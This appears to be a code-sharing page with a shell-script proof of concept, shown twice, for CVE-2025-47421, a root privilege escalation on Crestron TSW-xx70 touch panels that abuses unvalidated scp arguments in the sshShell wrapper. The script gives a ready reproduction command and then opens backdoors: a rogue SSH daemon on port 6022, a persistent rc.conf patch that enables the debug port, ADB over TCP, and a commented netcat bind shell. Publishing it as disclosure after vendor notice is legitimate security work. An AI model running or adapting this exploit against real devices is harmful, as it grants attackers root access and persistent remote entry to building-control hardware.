KazWolfe · March 23, 2026 00:32
diff --git a/crestron-root.sh b/crestron-root.sh
 #!/system/bin/bash

 # Shell vulnerability for Crestron TSW-xx70 devices. Requires existing admin permissions!
 # This vulnerability was reported to Crestron and assigned CVE-2025-47421.
 # It was disclosed in May 2025, and is being publically released here, in March 2026.
 #
 # Steps to Reproduce:
 # 1. Upload this file to /logs over SCP. Ensure that the execute bit is set.
 # 2. Run the following command locally:
 #
 #    ssh crestron@10.0.2.10 -- 'scp -vv -R / -S ./logs/shell.sh x@x:/ /'
 #
 # 3. Telnet to the device IP, port 4444. You will have a root shell.
 #
 # Principle of Operation:
 # The Crestron sshShell wrapper (at /vendor/bin/sshShell.sh) offers special operation modes for SCP and SFTP for
 # administrative purposes. Usually, these commands are somewhat protected through validation and user level checks. 
 # However, the scp handler's arguments are not validated properly. We can therefore pass in extra command-line
 # arguments such as -S to run an arbitrary script. The full breakdown of the scp command listed above specifies:
 # 
 # * -R /                 : sets the chroot for scp to /, allowing access to the full filesystem (required to run 
 #                          processes) and to escape the prior `cp`
 # * -S ./logs/shell.sh   : Calls `./logs/shell.sh` to act as the executable instead of `sftp`, et al.
 # * x@x:/                : A dummy SSH copy from to force invocation of the -S command.
 # * /                    : A dummy path to copy the file to. Only used to keep scp happy.
 #
 # The command as listed in sshShell is:
 # new_cmd=`echo "$@" | busybox awk '{print $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 }'`          
 # [ ... ]
 # scp -U $SCP_PARAM $new_cmd
 #
 # Now, all that remains is to actually create shell.sh. We use the logs folder since it's mounted without `noexec`,
 # allowing us to place a binary there for execution. Furthermore, since administrator-level users have permission
 # to write to this folder, they can set +x on files placed there.
 # 
 # Since `sshShell` is run as root, this script will _also_ have root access - allowing us to basically do whatever we
 # want.
 #
 # As written, this exploit will only work on administrator users, as -R cannot be re-set once set. Since -R is
 # ultimately evaluated before -S is, the process we "jump" to will need to be inside the chroot of the logs directory.
 # This exploit may, however, be easily extended to allow Programmer level users to escalate to full admins without much
 # additional work. As Programmers have write access to /mnt/sdcard/ftpprog/plog/ramdiskLogs, they are able to place a
 # binary and set +x on it, again as root. This means that a Programmer can static compile something like chw00t and use
 # it to escape the previously set root. Note that this will require omitting the "-R /" argument as well.
 #
 # IN THEORY, if an Operator can *somehow* get a file into `logs` or `ramdiskLogs`, they'll also be able to use the same
 # trick, so long as their command doesn't include a `-t`, which likely isn't going to happen in manual SCP cases.

 # Bind shell for xx70 devices. Should use something better, if we can.
 # nc -Elp 4444 /system/bin/bash -

 # SSH Debug port (6022) for xx70 devices
 if [ -f "/vendor/bin/sshd_bash.sh" ]; then
    start sshd_bash
    echo "Native sshd_bash process started. Try connecting to port 6022!" >&2
 else
    TZ=/etc/localtime /system/bin/sshd -p 6022
    echo "Didn't find sshd_bash service, started rogue SSHD. Try connecting to port 6022!" >&2
 fi

 # Patch our rc.conf to enable sshd forever. Only on xx70s, since TELNETPORT=2 is _very_ insecure on
 # xx60 devices. This should persist through upgrades, though it has been confirmed to be lost when
 # performing a factory reset.
 if [ -f "/vendor/bin/sshd_bash.sh" ]; then
    sed -i s!TELNETPORT=\"0\"!TELNETPORT=\"2\"!g /data/crestron/config/rc.conf
    backupAndRecover.sh COMPUTEHASH /data/crestron

    echo "Patch-enabled SSH debug port for future restarts." >&2
 fi

 # ADB enablement (all devices, failsafe in case sshd fails)
 setprop service.adb.tcp.port 5555
 start adbd
 echo "Enabled adbd on port 5555" >&2
	#!/system/bin/bash

	# Shell vulnerability for Crestron TSW-xx70 devices. Requires existing admin permissions!
	# This vulnerability was reported to Crestron and assigned CVE-2025-47421.
	# It was disclosed in May 2025, and is being publically released here, in March 2026.
	#
	# Steps to Reproduce:
	# 1. Upload this file to /logs over SCP. Ensure that the execute bit is set.
	# 2. Run the following command locally:
	#
	# ssh crestron@10.0.2.10 -- 'scp -vv -R / -S ./logs/shell.sh x@x:/ /'
	#
	# 3. Telnet to the device IP, port 4444. You will have a root shell.
	#
	# Principle of Operation:
	# The Crestron sshShell wrapper (at /vendor/bin/sshShell.sh) offers special operation modes for SCP and SFTP for
	# administrative purposes. Usually, these commands are somewhat protected through validation and user level checks.
	# However, the scp handler's arguments are not validated properly. We can therefore pass in extra command-line
	# arguments such as -S to run an arbitrary script. The full breakdown of the scp command listed above specifies:
	#
	# * -R / : sets the chroot for scp to /, allowing access to the full filesystem (required to run
	# processes) and to escape the prior `cp`
	# * -S ./logs/shell.sh : Calls `./logs/shell.sh` to act as the executable instead of `sftp`, et al.
	# * x@x:/ : A dummy SSH copy from to force invocation of the -S command.
	# * / : A dummy path to copy the file to. Only used to keep scp happy.
	#
	# The command as listed in sshShell is:
	# new_cmd=`echo "$@" \| busybox awk '{print $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 }'`
	# [ ... ]
	# scp -U $SCP_PARAM $new_cmd
	#
	# Now, all that remains is to actually create shell.sh. We use the logs folder since it's mounted without `noexec`,
	# allowing us to place a binary there for execution. Furthermore, since administrator-level users have permission
	# to write to this folder, they can set +x on files placed there.
	#
	# Since `sshShell` is run as root, this script will _also_ have root access - allowing us to basically do whatever we
	# want.
	#
	# As written, this exploit will only work on administrator users, as -R cannot be re-set once set. Since -R is
	# ultimately evaluated before -S is, the process we "jump" to will need to be inside the chroot of the logs directory.
	# This exploit may, however, be easily extended to allow Programmer level users to escalate to full admins without much
	# additional work. As Programmers have write access to /mnt/sdcard/ftpprog/plog/ramdiskLogs, they are able to place a
	# binary and set +x on it, again as root. This means that a Programmer can static compile something like chw00t and use
	# it to escape the previously set root. Note that this will require omitting the "-R /" argument as well.
	#
	# IN THEORY, if an Operator can somehow get a file into `logs` or `ramdiskLogs`, they'll also be able to use the same
	# trick, so long as their command doesn't include a `-t`, which likely isn't going to happen in manual SCP cases.

	# Bind shell for xx70 devices. Should use something better, if we can.
	# nc -Elp 4444 /system/bin/bash -

	# SSH Debug port (6022) for xx70 devices
	if [ -f "/vendor/bin/sshd_bash.sh" ]; then
	start sshd_bash
	echo "Native sshd_bash process started. Try connecting to port 6022!" >&2
	else
	TZ=/etc/localtime /system/bin/sshd -p 6022
	echo "Didn't find sshd_bash service, started rogue SSHD. Try connecting to port 6022!" >&2
	fi

	# Patch our rc.conf to enable sshd forever. Only on xx70s, since TELNETPORT=2 is _very_ insecure on
	# xx60 devices. This should persist through upgrades, though it has been confirmed to be lost when
	# performing a factory reset.
	if [ -f "/vendor/bin/sshd_bash.sh" ]; then
	sed -i s!TELNETPORT=\"0\"!TELNETPORT=\"2\"!g /data/crestron/config/rc.conf
	backupAndRecover.sh COMPUTEHASH /data/crestron

	echo "Patch-enabled SSH debug port for future restarts." >&2
	fi

	# ADB enablement (all devices, failsafe in case sshd fails)
	setprop service.adb.tcp.port 5555
	start adbd
	echo "Enabled adbd on port 5555" >&2
No results found